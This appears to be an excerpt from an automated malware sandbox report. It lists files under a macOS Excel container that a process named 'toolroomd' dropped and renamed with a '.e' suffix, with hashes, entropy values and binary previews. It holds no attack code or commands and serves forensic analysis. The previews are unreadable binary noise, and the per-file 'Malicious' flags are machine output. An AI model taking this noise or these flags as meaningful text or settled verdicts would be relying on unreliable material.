Preview:	.....0..wMv..T.I.O.p%.E..............!.+B.......H...G\i[%L..&.V#..%.,..+.w, .Yx!.vz.....N..4.E6(..i.j..$1.l.......{...J&.$..1nT..VW./.....1..h........9.#f.B5"A@I.}....#~..!..{y4jY....p......l....'@....~......S.lCyRsJ....l.\t...-.WyM.Ey....Z.M$!%eAkq..q...!........q[J.......?.E......Rk..SWk_v. ......w.SP....V.1.i...3W.?x....m).hd..8.5.1..N:tq.a.....;......,P-..f.=o..7...@d..+.&.$Pf.'..LZ...wo.&.....F..J]U..cX...s1.X.E.\.A.EQ.w,.....\|[..o.w.J...cE....w.jN..%+.Oo....4.Y.......d..N.`S.[.....1.-..J.,....w. y\.o...X.7..'n....-..J.,.#d~...\.o...X.....&.l.v@9+.GeQ.xb.o.5!# ....O/+...C........)......q.9.......h]E.g9.....J.uN.u....:d.^..&.J.Y..6.u.:3..&.f....r.1.1.?q6...........-..&C..........C...o..H.A.".IX~..A%.c..,.S..5n....bSC.0..P.....-.....x:......C... ..!#...u..2p.D8....H`.}..4i..!.$.M...p.M"q..D...`.7.B0..3T5=F..\V.[...'w....Ir04;..%.c..,.S...p...........5n.......^6.n8..(......[*:.}...\...:I.......).!...e.....4.....,P-...1.D.w

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Application Support/Microsoft/Office/OTele/.{4EF15A0C-CA5D-4AAD-8E4B-C935A2583FBB} (0) - 403 - microsoft excel - OTele.dat.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	754
Entropy (8bit):	6.767058328610431
Encrypted:	false
SSDEEP:	12:UU/COoLebkrWW+/9nKPZOqJVc+RksjX3eUh06yj710sewLYTc+qGm7:Ue3k964Om+Uhm6sePc0m7
MD5:	A2E9C6708D2D974726495FCEB132DFC0
SHA1:	5370B1A7A434E0082C5DCD593D53DD47A28F2BE6
SHA-256:	2BFD2CF20BA1F4B280B47988E0A6A2657E669BF364CBD685A08229E9E8205ABB
SHA-512:	55467F02466449C7884A22CE3CE7EC4C51629B49C0851AE8B9197612E13FA957BAA811E0F8D870EB405A6048FC90EBDA204259D97FAB8F2986A74D3F304E7EB4
Malicious:	false
Preview:	.......5F.c..g..C]?...H..j#..C............1..../...W!...o.....b.lM...sH3s?.aS=)....c.X..V..~...iV@h........6<.."a..Y.IE/.....B.....D..)..........h....cA....8.....Sg.N..L..........p.P....S.zT..J...'....U.i...0....v....h..>..........J...'....TgQ....4.K....zV..}...3j..G...%..j..........A..A.......i+7w.f...z~.....]...&B....4.K....zV..}..T.p;......^..oW<.;X.gt.......".l....L<.......!.d...7j./..r......E".z...7....J....g...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/Microsoft/uls/com.microsoft.Excel/.ci.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	370
Entropy (8bit):	5.058327690011446
Encrypted:	false
SSDEEP:	6:UquYOD5FN6LNaBzsewLYHEec/LaqG8rQQwiQ/6:UgODp60sewLYTc+qGm7
MD5:	C77F5F4EFEBA96AA0791C0ACF83CA838
SHA1:	4C8F0558C8F90B5B988ACA9EA57023FA5824A200
SHA-256:	DE98AD9F99D8D3677004C83EC339250EF2AEB40041AF3A97131CB21B631C20E8
SHA-512:	2EC3CDF3B94D3B1E3B44DCA8B27A007C66BCA88AF519837358542BE9757AEB993B245A162FFA1C4F3574CD512A607D03672AB412BAD07E28EE0B64BCBFDB9401
Malicious:	false
Preview:	...a>k..\.q.oL..M`..k......Y.O.u....rW..t....Sq6<.."a..O.3.+.W.A.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/.Cache.db-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.594011801958796
Encrypted:	false
SSDEEP:	24:ay/Jwv0+h7hInD9peFuh0/w4hzcl00000N00000000000000000000000000000Z:lbDqLy5YZHKMWcEv4SaNpq
MD5:	FB8B3905A15815D026C37B96A6A03DCE
SHA1:	4F2749C24E360656333BFF91AC526B3CB78BF3C9
SHA-256:	9259EF0330FB8BE52403F9325832E121AC5AA34C9226552D878554ACD4ADB1EB
SHA-512:	94564661A6ABDF1D2E90BA5253E07ABA6BF9B891D4722EAB25FDD9545E383D9FBD87DF51A04D8338B28599598A53C1202C22F5B90691E75D70AE5BED364F3EDC
Malicious:	false
Preview:	f...#D....b..._....V.H.4Rb.....~..I..%.c...f.f...#D....b..._....V.H.......~..I..%.c...f.6<.."a..0N....4....q.A"&6<.."a..6<.."a..^UN ...:.<..Yv.m...-...3o1..!......n...........L,._e...^UN ...:.<..Yv.m...-...3o1..!......n...........D..-><.}W.x..v3.E..o.........d..(.......'F.[..(.^UN ...:.<..Yv.m...-...3......??.4..#.x...gl.A.q...O.%%p=+.%'.[^UN ...:.<..Yv.m...-...3o1..!......n...........:.<.g.B..'.T.u\|...S...S.M.;._.r......V....\1a.{.@T'..o^UN ...:.<..Yv.m...-...3o1..!......n..............<..M.^...#np.W..;.B_6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/.Cache.db-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	408442
Entropy (8bit):	6.082187116847515
Encrypted:	false
SSDEEP:	6144:yD5H6bElqMY/l3pbIgeR5Pour9ZSDMEjeZQ:B6SX
MD5:	41E7DC9307A01D879BA5B9A03F55CDD7
SHA1:	897DC3474977A2A4ABC600B8421AD64DF0F02390
SHA-256:	C8CCED6F50837CCB8B6368F0B2B88DF62C8B959E9DD50E9BB2C3C74027D43D1B
SHA-512:	0F92FD0A27574B268D981D8E7340E97432EDBD51F40F7C13771B32D0A7576F5597653FB53210013EBCB6C83B0EEF1286CD416E85738A2EF130596DD35495DD25
Malicious:	false
Preview:	^u..o.F.47.W&.z.~..I..\.<.....7...x~..I..87!]..qm..d.=..._t........x.iE...ao.eb6<.."a....I,`...ax..J.....7...x..7...x6<.."a..6<.."a..g..{}:.c.P.>.T.Z..Y#)j12"..-..!....`..u.;2.c-/.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/.Cache.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	53589
Entropy (8bit):	3.601616927263299
Encrypted:	false
SSDEEP:	48:76HBY3OO/2sbj028GRp/oLP+501K2TxD4XRB2/OGNpq:8RujDL/oLGm11B4hBiOGu
MD5:	9DCDB17D6D5E32EB45B2F68064F1209C
SHA1:	0864BAF74F3428747441E12493858EEBD5C7F2AA
SHA-256:	96AEEC3C8337387EC8B23E0DAD1701906FD39F211DD94D178B9AE7B806E96504
SHA-512:	41811E38E1CD488C3F9957A47CFFCE3921D924F9CCDA9623C30580764BE078B9B818D16617E44F944E97CBF573DB79C1D249156A75FEFB0CC96EFF9C8F8F8076
Malicious:	false
Preview:	..d.=..._t.........X...vi..b..6<.."a....I,`...ax..J.....7...x..7...xt....Sq6<.."a...2.I6.1..P.>.T.Z..Y#)j12"..-..!....`..u.;2.c-/.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/.HSTS.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	586
Entropy (8bit):	6.370862436429925
Encrypted:	false
SSDEEP:	12:UEMb71OLrGu/H+7rkcjG1OyTmmrk/OsewLYTc+qGm7:UEi8LrG4HuH3prWsePc0m7
MD5:	CA156D2AC597D001C9AE1BB61AD5516D
SHA1:	E3DC8B09D86C1D3EC1BF117AF2E72190AD568C20
SHA-256:	E940B4E44DC26733F7B659AF374A9DBFD4D2AD345CC2F984DF78228ABC6ECB15
SHA-512:	BAD405E470CBB2661B8173095F8518B8D9743311AF2189359E66B811FEC5768AB672F246D36DE74987E11184CC45A11CBEB2D23A1EDED42811DF827DF0304B18
Malicious:	false
Preview:	...a>k...6...\......R...o..'.>H.....0l.V...\6....)...:8.><.7T.}.G...y..r#e.).p..W......4..l.....\|Va..H.J.VW...p.W....#..i#..usx.=..:r<hO..kA.X.B...b.....4.Y~e..R..:...I.....}........K.$...Pg..dL.u.=..ovW.v..'0...<L.g..p...<..$.......rW..o.j..%.6<.."a..`..i.....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.05FFDE06-7502-4EDD-BBFA-78890F78FF87.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	97255
Entropy (8bit):	7.99381771447326
Encrypted:	true
SSDEEP:	1536:aaWuJ5AWZjCSppW1laifu5ThUosz7Fe0yNmeTyiOfUTaCD69VjQHQN9yD:ahuJ5Aa7nIl9fu5Bsz7Fe0yNmeTydCD9
MD5:	CAB56325201B01057F8A16800BB20484
SHA1:	185358BE53FA7CE6123C99CE4A7AED301EE9CE2A
SHA-256:	492E298314D77F7BDD37C776CE2EB6CFB085761CE257B62924069689FF266A85
SHA-512:	E58979D538640D081B20A020E6829992F74FD858CAC417CE5DDD6A82BC60295EC8C51AA9C874D22681C747881987B8B71A41DDF0F3BDC04787AA3CFFE1159825
Malicious:	false
Preview:	<...wN.0...3..z.d......x...........6C{._.WL....Z=..ilvc..id..>.#.[..o....z`.!...%.i..u@...M..._y.SX.;.....f.g..A+..Z..!_G-...HO%0....Q?.~JE`.e....$.C[q......J/........c.{.Z......kt.^....:.+.....j..+c..B..V.......4....)..L7..K'u.\...G.=e.f.F$..t.{F......A...A.....m....&..W}^.!.D.e....V.A........U..?.8......{.g0.8. S.}7.oU.Xz...l.@...XxR`..t....RR'u..L=6..F\|.:N......9M.....kC.-....UU..... (.......Z~...v.y.aG\.d"..'.e...2@..........>..W~f./.l..X\|&5+..M".,...&".$..#...w.vF.=J.m.....7u..F.=J.m........x{.>XA.#..M./3..\....^....~...qy=`y.u:.%..$g..?........):_.wT...(.x...b....6......!...x,..v.V.~e>.c..\|....5......Y....C5.>.7.{.5......\|~..v..).)7^.......%..4F.D=.#5.]i#.F.W..3.;....[..E....A...Y..m...Pl.."....k..{....fMT\s.\|..-.b:;y.{..A...\......S.......N.K(.Z.........<........g.f.M.8....t....G p@U......9.Whi..G'..G`#.2....X.#..6A......\....... ......u...F.....,BK.....+.....d..F&....q.Uloa.G...z.y.#OC.9.t..5j.~.(.`y<..0Nfh..c2...

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.0C0C5245-148F-499D-8E47-AE50EB5FC261.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	30451
Entropy (8bit):	7.982525898680812
Encrypted:	false
SSDEEP:	768:gXoryTJW95J72TQZRVV0YMC+jU+uXBgaBFJGkZePMUVPFYC:gsk0vBNmYMC+4UcZRAPF5
MD5:	05712F7F41D6EBB600BE6BA3D2FB7AAC
SHA1:	2E2DBC76A20FB285D8332F5FA9DC885939F0365D
SHA-256:	B85B1CD3FEB2FA6BFF5F6536BB33792508373431A155FFAB97DBD3500EA6DD99
SHA-512:	66AFBD9D6983B93D5A5D053BFDF53ECCCEAAACF111693C0E4E380D54735529D414EF9714F5974952AC5D35695B5016CA2D3044E7B87070446FEB40E268E338E6
Malicious:	false
Preview:	.a.V.Q........0.6............/i/...d5.H..b....BMgh.G......;h.....K.....'........r.G.. ......O.!V..,.Y.O.[....K=..J.T./.r6.....\|A..aV......... ;..5....I.B.... .y.Q.@...ex..Ds.Wg..\.M..+g..&g..5j.~.(....kD......^S...x....6....k.....n.^.Q.6..S.f.v:....H8@...}.$..._.e..,..g..s.j./.2...7...O.O:..c. .. ...c...^.D..N..I....]....@fi{..{.D.e......k..._..%..%..h\.zX............,.E.dk:..'....DJ....&K...]....1.b.....<.^)%.ZE.C.t},p._.9.`.}......1\|......'N.wN.U-.(.].s/p.a...8.1....wM...Tt\.E.;[{..X..G..v......6.i....G...Vt.l.........}.w.d...%....k.W.....M......w......'.b.v....;.h.N..._G:..).I...+..%Le.^.-.....f.d...nJ.I...k.8;.&//.~...\D.!.........3{..c..*<mm....?6c...QW.......j....l.f..\|....../...^...)}nR2#...G.h.........b+=W.x......f..[..j].-$'4'W........}....z.....{...6.[!.c.....P..Q...vi.L...C0=..!aS.a..3..GZ..a..d...K!Y...s-^7.y+;n.i..@..:.K.....B'`2>.X.J\p.}./lJ9ZV..-%.ZE.C.t},p._.9.`.}..........f.:...Q..f..#e\}..o..).=N...b1.....!.d...

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.0DCDE0EB-7EC7-468E-8415-20ABE851B2A4.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	17491
Entropy (8bit):	6.854889353148229
Encrypted:	false
SSDEEP:	192:F4//4//4//4//4//4//4//4//4//4//4//4//4//4//4/z224222k22o22P2SGGf:AGG5GGYGGGeGGCGGRXnSSSS5
MD5:	DCBEE04F5A5813985D000EA8CBC5C389
SHA1:	3B83478FB9E028B27CF2410BC24DF2E57CF36422
SHA-256:	5066AC4DFE5658E9ED9B3D33C181D7F5A7C795FD948B4ACD852855527F52DE47
SHA-512:	FE19976B205D42B07A54D187A8A281C6D61819DA2803343D234B1B01261CDD077A07B8DDA34B214E6830EF6013AEEC2494D7684E6F199CFCCA5DBFDE2815707F
Malicious:	false
Preview:	.l..)..(.....p5_N.....bs-Yo.w...E.......a...1N.4.M.7.P.@..8O.DR'....X...&.H......uC..:...>.0)v....y..Ts'4.l..m...s..`.r..6<.."a..6<.."a..rZ.Al.G.........Y...6<.."a..6<.."a..6<.."a..6<.."a......Q.:........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'l..?<b.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'l..?<b.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'l..?<b.........................^.uB.....'uB.....'uB.....'eh...+z.........................^.uB.....'uB.....'uB.....'eh...+z...................

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.26479BCB-1120-4001-B963-D0AA6917C4A3.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	32187
Entropy (8bit):	7.98644334972886
Encrypted:	false
SSDEEP:	768:+zGX3ZQQGC0cYY0+j1sSeYRWiczrMimhqCRbddmdqAqMjPdGpafYgdV+nznQMIJH:+CXJfKlhVEWiKr6qCJdslW0KMf
MD5:	4E8FEFB0307D2B20A8D050F66B46927C
SHA1:	6E54C88B27CD51A4F57FF3243C4DDFBB768D4ABC
SHA-256:	E61A18BD8D8F35BBF2FB246F485B0E00509892FB0E531C8CE48EA691D49C3B31
SHA-512:	7DB3C8D189DE65430863DE389100372F0B6C7C38BE2809B93CC18BD91E64761C73846ACAE3A4161308D2E1F1887A65E27D9D71622B665E8C3D9916D2CAD9D886
Malicious:	false
Preview:	{....C}8...oq.N.+..2l......+...D....i....~e$.pr..r.....mW.T.[4......%.h..6.o..U..?.8..^..w..\....=....D.JH. ...g....\|.=....v.....N..F"])&@.V#.sC....M%1Z;..'.%Cj.1x.9;.:..0)<@O.Dc....Q4...U..?.8.....,b.<.q..8.ts8..\.ow.^....~...qy=`y...,^.W...O+.t..x(....T.i..^.@....~6fFZ.J..;.$.mW'.1.Mxz....5..... ..5E....b>...v...........j.l:....~. .<...B.6....A..h..J.$b'J.A....6...b;.J..x.%.3.....E.U.......x.RR......U.(..J.J. .T.J.V...qV....=C...m#e.&J.].#C...5j.~.(..QX;.n..'....3...t..w.H....N!.5&....m.......>..._E_1].2....[L..yV..N.%.K.p..a...JS..Q.6..p3.+...V.%.n..~o4....G.2/$.<.\|...........GFm.Y.<.....ui..G..-.!..........>..W~f./..`Q..,m.9..>.'..].l..V.Z6I..i1...3.Gl...O`..0Z.#....O..8Q......f...^G..w.q.RF.1_%.]u..E...O.t..W.s..h.FWT......v.'i..(..A.,?a....G].M{P<0........y...J..........r^..Hq....7X+.k.FP.&..B..J..V/..?..=-m...e".'.\1.~_./.@l..d...(6.9&.._..D...g)m.3......w.5...H.ST..=..u.p. Y.m.A3.l.......>*..W~f./..ZMOB..8.F.....'..1...q....$.

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.488F1386-F519-41AE-8F2A-3032CA44EFA8.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	412363
Entropy (8bit):	7.980823514760723
Encrypted:	false
SSDEEP:	6144:mV+LRLGhpZ1tWTHwfAoF7lkFTzgUm0q1OV6XDI/FGgwD0c6XfuX7IkkF9qzRTDu4:5JGhZITQfAclkNIMvwD0PyvScRTDB
MD5:	DA8A732EF8CDFC1E217B666732BE25C0
SHA1:	F64DAD82684550337C428ACF8EAC2384804F0B52
SHA-256:	9D28234E0629A86801CDE8C1E2192C4CF2F9A2C97F1405CA5FA3D0550358CB72
SHA-512:	CBC87A23AB14F4FB3C7F8FD2F9D81CA5A1DCE030FC6AFE4DCDF0CE687381C61A352EBF9D0B2E670FBEA161E41EA426038B2AE0BB793B3B7F46981DDB954A0A46
Malicious:	false
Preview:	.:..>oi...R....,..R....,..R....,..R....,..R....,LeA.{..0...........C...N.z\.b....R....,..R....,..R....,..R....,..R....,.\|..3...YS<2.`.J-G..!..~b}.%~V:.<...`..P.Ul.tw.....A.b..:$....I../.#.......R.G.u.m.)......H.{B...."Fg'.U..=.Ro2n\|.;\.]..0/...1....>R}.._..T...p.R..).z.2..<."..l...^o...,v.....5(..w..Ao.&..B....g....n0.......9.1..$.....Ud.C^..k......c9.....[..r.u..j.)...\|.Y..6.g....{.Z..O.cl.+o..A...DJ.........;k>~n.j....._.P.E..r.....8..p..wmKY.p.....M..WC.\|..F.B.DE. ..1.r.f........=S%..(U..(u.bG..yp.@....s....k.=...k.....wb.}_..L.w..2,..Q....SD^...XZ..T...D.....l...'.Q7.tK1.`'..^..WU-..S_...._...;[.}..d....f.q:..A\|.2..l....t9..=.......XE.g...u.q....Vp:.vC..L..z.8Y.?^P^i\|.5dY.g..k2....2.......\......r.....&..P. I.F!.v.h.s....V.+8.U...[6P!...8Z.../.li..._(W.G..R....,..R....,..R....,..R....,E.Qh5.sn......%=..i"..5.[....u.isI.r....R....,..R....,..R....,..R....,.8..wS.z.....#d.I..5j.~.(.y.1...!.].s\|zi.......{&..E..M.A1.M*.F.U.8.V.....rJ...j

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.5319D567-A7B5-432B-B2E9-4C799D2C5119.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	105736
Entropy (8bit):	7.991253020999725
Encrypted:	true
SSDEEP:	3072:cKPEgEbQbqjfu4icvpSZO0bUfej2UmEthRDFtZlUaxAC2ifF:cqh2L16GehdtrTWCrF
MD5:	6CC25901D3D4B998364541AC9D80D8FA
SHA1:	1AD2FA063221D60D74172A92FE9AA3FCA095F9BD
SHA-256:	252FC8C5D4EA15F62031EEBC4AADA4647C2DD36A6A31F6E33E55AA8531CF1ACD
SHA-512:	7EC8D36862A551AABAEA3D146E6A265265D364D481FCBC6AB9F8FEAD4F90A2FC2EE58931820F2ADD46DB2CC559F749FBD8C9B2E506A60C5A867C02F5B3B86F47
Malicious:	false
Preview:	..DR..$A...!...by..hUd.....L..P<..xVeQ...O]H.....8iE....m.. ...->H.YE.Qh5.sn..R....,..R....,..R....,..R....,p.n....\|=..i"..5.[....u.isI.r....R....,..R....,..R....,..R....,.Y.~...YS<2.`.J-G..!..~b}.%~V:.<...`..P.Ul.tw.....A.b..:$....I../.#.......R.G.u.m.)......H.{B...."Fg'.U..=.Ro2n\|.;\.]..0/...1....>R}.._..T...O_.,V.j..2..<."..l...^o...,v.....5(..w..Ao.&..B....g...kB).;.K...9.1..$.....Ud.C^..k......c9.....[..r.u..j.)...\|.Y..6.g....{.Z..O.cl.+o..A...DJ.........;k>~n.j....._.P.E..r.....8..p..wmKY.p.....M..WC.\|..F.B.DE. ..1.r.f........=S%..(U..(u.bG..yp.....3....k.=...k.....wb.}_..L.w..2,..Q....SD^...XZ...^.......l...'.Q7.tK1.`'..^..WU-..S_...._...;[.}..d......X....R....,..R....,..R....,..R....,..R....,..R....,..R....,..R....,..R....,][..{..r.'?.].O+.#.............R....,..R....,..R....,..R....,E.Qh5.sn..R....,..R....,..R....,..R....,l.A.......i.v.t..nH..9...h..j....f....WM.u3F....P.B...k.XH6.'.~.....4#..r...j_0kT......^.:6....Z3.h.....O.......D{

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.5F638F8B-CA19-4778-9256-2CB283B20F39.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	15162
Entropy (8bit):	7.9716543230956995
Encrypted:	false
SSDEEP:	384:7x6pqE5So6DcJ/g0dmvOhmX9/tpUGBLgle82U+k6UFI4jS:sg43tkJUGJNw68jS
MD5:	71E6E5D2D0F0FE6E5E84BDA2E74C22D4
SHA1:	D6EB44F3CE5B8DE710BB73A7331BA61D3CB83C19
SHA-256:	E37FF14F883D9BE990292A12BACA854DD374BAAA8510C8FAE2CB2BE7D173BD01
SHA-512:	222A6268AAE81A6825588012777DD0FF0716BC96923DA9C0E3C8740E804E95FFB508A28EAD2928F83ECC2F0B8433D74D3F1FF237D6C9908BEF198F264B410D16
Malicious:	false
Preview:	M...#.5..?....h.L8...4$@..`......./.m,...o.U..[+....Q... .....i..;. ....i.....l..m...)#u..)....C>..K.. .r...!._..=..!...0y-..{.]2W....H,..^Pd%.p.;U..?.8......\.N....]c.H..Rn..?>.....{<.}sQ......v....kT.....h;.......Vx.....b..i..\..H;ud.1...M.."Q.1r.....c.p....nO..q.n.....U%.5.9.)H...%K...pC...C.1...!..dQ...`.:.D....8......x.E....d.Ab2.........R.jYN.,.......g.q<.eg.._..;.S..H2..a..==....-K...D.......w.Cp..d.+..W....H6.^.......Ab2......<.;:Rd9l..0.'r.wl...Y.............\..K.Ki#,P1...}....K.Ki#,$..?...(.8.J.OB=t!..){...$...f#....cr..u+../b,n..['<.k.Mm.%W~.3..S.....A...B.}.OXC.] ~.IB%..].y..U........3.....)..2.@\....L...r..Q.d. ...s....^....c..u..%.U?.j.@.V>...v......+.`.s..[.x.I.f.5d4Z,..<\...k+..D..;9!K.....D.f.f#.9nk..>...u..X.t..O....C..&.....a.(..q.....n.{X.....J......1..+`H*V....J.g.#[)...~6...]......\|...U..8.&wT.B...3..\|.{J.=...t7.c...._.Crq.@..'..f.......&..[.g&...e..t...JU..V....e.M...l..N......n..Q.,......]...0...?\|...A.

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.AC9CD1E6-D3A3-4041-BFBE-90AF5A935D47.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	22083
Entropy (8bit):	7.97052565722907
Encrypted:	false
SSDEEP:	384:FJvQj8a37Usxq1jbb0xHdwKvK6B48QcWRTadF40kg5llaYBYX:FJna37UWq1jbb0x9wKS6YCK/g5llZYX
MD5:	5BF8A8F090242BB2D115182EB89A02A0
SHA1:	7BBBB7C664DB30AEF1FB7AB5EB2D246BF4E982DF
SHA-256:	605C009E74CE51071290BFD8931F46E44F4CC89EC27016103166CC2541C8566F
SHA-512:	BD4107A2BAF76ABAB2D463639B5983AA96103D090D8652D4D81A465FD90901D69218312100D006C1587F83783C9B182D7F61220C5ADB464DC955283371D90300
Malicious:	false
Preview:	I....`.......g..HO.A=<...d`....d..Y..V..D..K....+....d..4p.......g.....M...T.8\|\|Hu...2,gM.B$p.t.b.-.VBb..o`C....Oh..B....;...u..?.....-ik.D.v....;...6=Z,......@..m".....d....8..bj.......L..b nQ...[....9..h^`>..5.....u=.N5..v....t#...c2...C........xVv?....@.;q't..8f<..k0c.Q.....A>n..v..A]3.Xx...c.;0.6..i.C.~......z.U} .v.......8.V.W4...\...F.......>.......Y.r.\.....R.9{.&.\|..,-H=.tC.7.j......Y.r.\a....o..n...4..E.....l.$G..:0;hf.....A../.......nG...}.TT..(..".o.l`.m\FE..Arl...F...y.v.....\.!.5.!..-..J.vV.....(.20....&.&...g{..`-..._.o........a4}4Z.......n.....q..s.aQwz>p.E..`.by59.y.R\j.!$r.V.u..4B...I..r.....T....b.m...+W.-6.)K..U.$6.[...7D.8..}7....=T'.(.GBb.b.V.`.._....J.W......a..c.F..V.5.@....X...{Q.../.^.w{..(...T...(i.C.....!y...rZV..):.uxf.H.EH!...x1(.m....U.]<....^biz......p...:.6OY@....S.q..05d.x.2@;..7...a,..Q..X3.\......9L..GX-'......T.8\|e`3.EK..\|.O>jZBOjU..#.....g'..eT.....3...../...b.i.%'..#I...\|.3......./..v.:..P.....

/Users/berri/Library/Containers/com.microsoft.Excel/Data/Library/Caches/com.microsoft.Excel/fsCachedData/.D1A1661A-4CE6-4760-88DD-B61E7962EEF3.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	60693
Entropy (8bit):	7.990490802209078
Encrypted:	true
SSDEEP:	1536:RmoLK1LcNVmzEsNn3vTAW/FFaTWTrSjdXONpHUr09i:pKWVqEsJ3vkwFaArqJBr0i
MD5:	CBF303FFE7796B0F6AB40830A678F0BD
